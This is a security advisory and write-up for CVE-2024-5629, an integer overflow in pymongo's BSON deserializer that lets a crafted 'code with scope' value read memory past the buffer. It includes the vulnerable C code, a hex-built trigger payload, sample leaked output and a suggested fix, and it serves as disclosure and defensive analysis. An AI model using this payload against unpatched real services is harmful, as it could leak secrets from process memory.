Assigned CVE: CVE-2024-5629
Snyk advisory: SNYK-PYTHON-PYMONGO-7172112
GitHub advisory: GHSA-m87m-mmvp-v9qm
GitHub commit: PYTHON-4305 Fix bson size check (#1564)
Package manager: pip
Affected module: pymongo
GitHub repo: mongodb/mongo-python-driver
Module description:
The PyMongo distribution contains tools for interacting with MongoDB database from Python. The bson package is an implementation of the BSON format for Python. The pymongo package is a native Python driver for MongoDB. The gridfs package is a gridfs implementation on top of pymongo.
Out-of-bounds read in the bson module. Possible risk: leak of sensitive data.
Vulnerability: integer overflow in BSON deserialization. With a crafted payload, an attacker can force the parser to deserialize unmanaged memory. The parser tries to interpret the bytes that follow the buffer and raises an exception whose message contains them as a string. If those bytes are not valid UTF-8, the exception reports a single byte instead.
I've tested it on Ubuntu 22.04.3 LTS, kernel version: 5.15.0-84-generic.
There is a simple PoC in file poc.py. The PoC contains two cases:
- leak of a variable that is in use; an arbitrary string in memory could be leaked the same way
- leak of 5 single non-printable bytes
You can use the provided Dockerfile to reproduce the environment.
- Build the image
docker build --tag pymongo-poc .
- Run the image
docker run --rm pymongo-poc
- Expected behaviour
$ docker run --rm pymongo-poc
## case 1: leak the printable string ##
Detected unknown BSON type b'\x00' for fieldname 'XXXXXXXXXXXXXX'. Are you using the latest driver version?
## case 2: leak some non-printable bytes ##
'utf-8' codec can't decode byte 0x90 in position 1: invalid start byte
'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte
'utf-8' codec can't decode byte 0x98 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xf7 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xff in position 0: invalid start byte
Please note that XXXXXXXXXXXXXX is a part of the secret variable. The bytes [0x90, 0xfc, 0x98, 0xf7, 0xff] could be consecutive bytes from process memory.
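As a small illustration of how the "case 2" output maps to the byte list above, the sketch below pulls the reported byte value out of each message. The regular expression and the helper name leaked_bytes are assumptions made for this example; they are not part of poc.py.

```python
import re

# Messages copied from the "case 2" output shown above.
messages = [
    "'utf-8' codec can't decode byte 0x90 in position 1: invalid start byte",
    "'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte",
    "'utf-8' codec can't decode byte 0x98 in position 0: invalid start byte",
    "'utf-8' codec can't decode byte 0xf7 in position 0: invalid start byte",
    "'utf-8' codec can't decode byte 0xff in position 0: invalid start byte",
]

# Hypothetical pattern for the byte value inside a UnicodeDecodeError message.
BYTE_RE = re.compile(r"can't decode byte 0x([0-9a-f]{2})")


def leaked_bytes(lines):
    """Collect the single byte that each error message reports."""
    out = bytearray()
    for line in lines:
        match = BYTE_RE.search(line)
        if match:
            out.append(int(match.group(1), 16))
    return bytes(out)


print(leaked_bytes(messages).hex())  # 90fc98f7ff
```

Each exception exposes only one byte, which is why the PoC needs five attempts to collect five bytes.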
The source code of the tested version is here: https://github.com/mongodb/mongo-python-driver/tree/4.6.2
The vulnerability is located in file bson/_cbsonmodule.c. The interesting part is deserialization of type 15 (JavaScript code with scope):
case 15:
    {
        uint32_t c_w_s_size;
        uint32_t code_size;
        uint32_t scope_size;
        PyObject* code;
        PyObject* scope;
        PyObject* code_type;
        if (max < 8) {
            goto invalid;
        }
        memcpy(&c_w_s_size, buffer + *position, 4);
        c_w_s_size = BSON_UINT32_FROM_LE(c_w_s_size);
        *position += 4;
        if (max < c_w_s_size) {
            goto invalid;
        }
        memcpy(&code_size, buffer + *position, 4);
        code_size = BSON_UINT32_FROM_LE(code_size);
        /* code_w_scope length + code length + code + scope length */
        if (!code_size || max < code_size || max < 4 + 4 + code_size + 4) {
            goto invalid;
        }
        *position += 4;
        /* Strings must end in \0 */
        if (buffer[*position + code_size - 1]) {
            goto invalid;
        }
        code = PyUnicode_DecodeUTF8(
            buffer + *position, code_size - 1,
            options->unicode_decode_error_handler);
        if (!code) {
            goto invalid;
        }
        *position += code_size;
        memcpy(&scope_size, buffer + *position, 4);
        scope_size = BSON_UINT32_FROM_LE(scope_size);
        if (scope_size < BSON_MIN_SIZE) {
            Py_DECREF(code);
            goto invalid;
        }
        /* code length + code + scope length + scope */
        if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
            Py_DECREF(code);
            goto invalid;
        }
        /* Check for bad eoo */
        if (buffer[*position + scope_size - 1]) {
            goto invalid;
        }
        scope = elements_to_dict(self, buffer + *position + 4,
                                 scope_size - 5, options);
        if (!scope) {
            Py_DECREF(code);
            goto invalid;
        }
        *position += scope_size;
        if ((code_type = _get_object(state->Code, "bson.code", "Code"))) {
            value = PyObject_CallFunctionObjArgs(code_type, code, scope, NULL);
            Py_DECREF(code_type);
        }
        Py_DECREF(code);
        Py_DECREF(scope);
        break;
    }
The "code with scope" type contains the function code itself (usually JavaScript) and its scope, where the scope is a mapping of the variables the code closes over. The code is straightforward, so I won't describe it in detail.
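To make the three size fields concrete, here is a minimal sketch that encodes a well-formed "code with scope" value by hand, following the layout the C code above parses. The helper name encode_code_w_scope is hypothetical, and the empty scope document is an assumption chosen to keep the example short.

```python
import struct

# An empty BSON document: 4-byte length (5) followed by the terminating \0.
EMPTY_DOC = b"\x05\x00\x00\x00\x00"


def encode_code_w_scope(code: str, scope_doc: bytes = EMPTY_DOC) -> bytes:
    """Encode a "code with scope" value (without the type byte and key)."""
    code_bytes = code.encode("utf-8") + b"\x00"   # strings must end in \0
    code_size = len(code_bytes)
    scope_size = len(scope_doc)                   # includes its own length field
    # Same sum the parser recomputes: 4 + code_size + 4 + scope_size.
    c_w_s_size = 4 + code_size + 4 + scope_size
    return (
        struct.pack("<I", c_w_s_size)
        + struct.pack("<I", code_size)
        + code_bytes
        + scope_doc
    )


value = encode_code_w_scope("A")
c_w_s_size, code_size = struct.unpack_from("<II", value, 0)
(scope_size,) = struct.unpack_from("<I", value, 8 + code_size)
print(c_w_s_size, code_size, scope_size, len(value))  # 15 2 5 15
```

In a well-formed value, c_w_s_size equals the real byte length of the whole value, which is the property the parser tries to verify.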
The vulnerable part is here:
/* code length + code + scope length + scope */
if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
    Py_DECREF(code);
    goto invalid;
}
Please note that the variables code_size, scope_size, and c_w_s_size are controlled by the attacker, since they are stored in the input buffer as 4-byte integers. Since all of them are uint32_t integers, it is possible to trigger an integer overflow here. We can set scope_size to a "negative" value (for an unsigned integer, this means a very large value) and bypass the check using crafted code_size and c_w_s_size values.
Then scope_size - 5 is passed to the elements_to_dict() function as the length to parse. If the value is big enough, the function will deserialize unmanaged memory (next to the buffer). This memory will be interpreted as a BSON structure with the fields "type" and "fieldname". If we set the "type" to some invalid value (for example \x00), bson will raise an exception containing the "fieldname" string.
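The wraparound can be checked with a few lines of arithmetic. The sketch below models uint32_t addition by masking to 32 bits and uses the code_size and scope_size values from the PoC trigger in this report; the helper name wrapped_total is made up for the example.

```python
MASK32 = 0xFFFFFFFF  # uint32_t arithmetic wraps modulo 2**32


def wrapped_total(code_size: int, scope_size: int) -> int:
    """Model `4 + code_size + 4 + scope_size` as computed on uint32_t values."""
    return (4 + code_size + 4 + scope_size) & MASK32


code_size = 0x00000004   # value used by the PoC trigger
scope_size = 0xFFFFFFFE  # the "negative" value used by the PoC trigger

# The c_w_s_size an attacker has to write so that the equality check passes.
c_w_s_size = wrapped_total(code_size, scope_size)
print(hex(c_w_s_size))  # 0xa

# Length that would then be handed to elements_to_dict().
print(hex((scope_size - 5) & MASK32))  # 0xfffffff9
```

The computed 0xa matches the c_w_s_size field of the trigger, so the sum check passes even though scope_size is far larger than the buffer.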
An example trigger (from the PoC file):
bytes.fromhex(
    struct.pack('<I', length).hex() +       # payload size
    '0f' +                                  # type "code with scope"
    '3100' +                                # key (cstring)
    '0a000000' +                            # c_w_s_size
    '04000000' +                            # code_size
    '41004200' +                            # code (cstring)
    'feffffff' +                            # scope_size
    '02' +                                  # type "string"
    '3200' +                                # key (cstring)
    struct.pack('<I', string_size).hex() +  # string size
    '00' * string_size                      # value (cstring)
    # the next bytes are read as the field name for type \x00
    # type \x00 is invalid, so bson raises an exception
)
The last '00' byte is interpreted as type \x00, and the next bytes (located after the managed buffer) are interpreted as the fieldname. Since type \x00 is invalid, the fieldname is included in the raised exception.
There is a check for the c_w_s_size variable only:
if (max < c_w_s_size) {
    goto invalid;
}
I would suggest adding the same checks for the code_size and scope_size variables. That makes it impossible to trigger the integer overflow here.
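The effect of the suggested extra bound can be modelled in Python. This is only a sketch of the size checks in the type-15 branch, not the patch that shipped in v4.6.3. The function name, the hardened flag, and the 32-byte buffer size are assumptions for illustration, and BSON_MIN_SIZE is assumed to be 5. In the quoted C code code_size is already compared against max, so the sketch adds the comparison for scope_size.

```python
MASK32 = 0xFFFFFFFF
BSON_MIN_SIZE = 5  # assumed: 4-byte length plus the terminating \0


def size_checks_pass(max_len, c_w_s_size, code_size, scope_size, hardened):
    """Model only the size checks of the type-15 branch; True means accepted."""
    if max_len < 8 or max_len < c_w_s_size:
        return False
    if (not code_size or max_len < code_size
            or max_len < (4 + 4 + code_size + 4) & MASK32):
        return False
    if scope_size < BSON_MIN_SIZE:
        return False
    # Suggested extra bound (assumption): scope must fit in the buffer too.
    if hardened and max_len < scope_size:
        return False
    # uint32_t sum, wrapping modulo 2**32 as in the C code.
    return ((4 + code_size + 4 + scope_size) & MASK32) == c_w_s_size


MAX_LEN = 32  # hypothetical number of bytes remaining in the buffer

# Values from the PoC trigger: accepted today, rejected with the extra bound.
print(size_checks_pass(MAX_LEN, 0x0A, 4, 0xFFFFFFFE, hardened=False))  # True
print(size_checks_pass(MAX_LEN, 0x0A, 4, 0xFFFFFFFE, hardened=True))   # False

# A well-formed value (code "A", empty scope) is still accepted.
print(size_checks_pass(MAX_LEN, 15, 2, 5, hardened=True))              # True
```

Once every term is bounded by the remaining buffer size, the sum stays far below 2**32 for realistic buffers, so it can no longer wrap around to a small c_w_s_size.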
Deserialization is usually non-trivial and difficult to implement without bugs. I read the entire bson code carefully, paying particular attention to the use of integer variables, and came across this issue.
The bug has been fixed in v4.6.3, changelog: https://pymongo.readthedocs.io/en/4.7.0/changelog.html#changes-in-version-4-6-3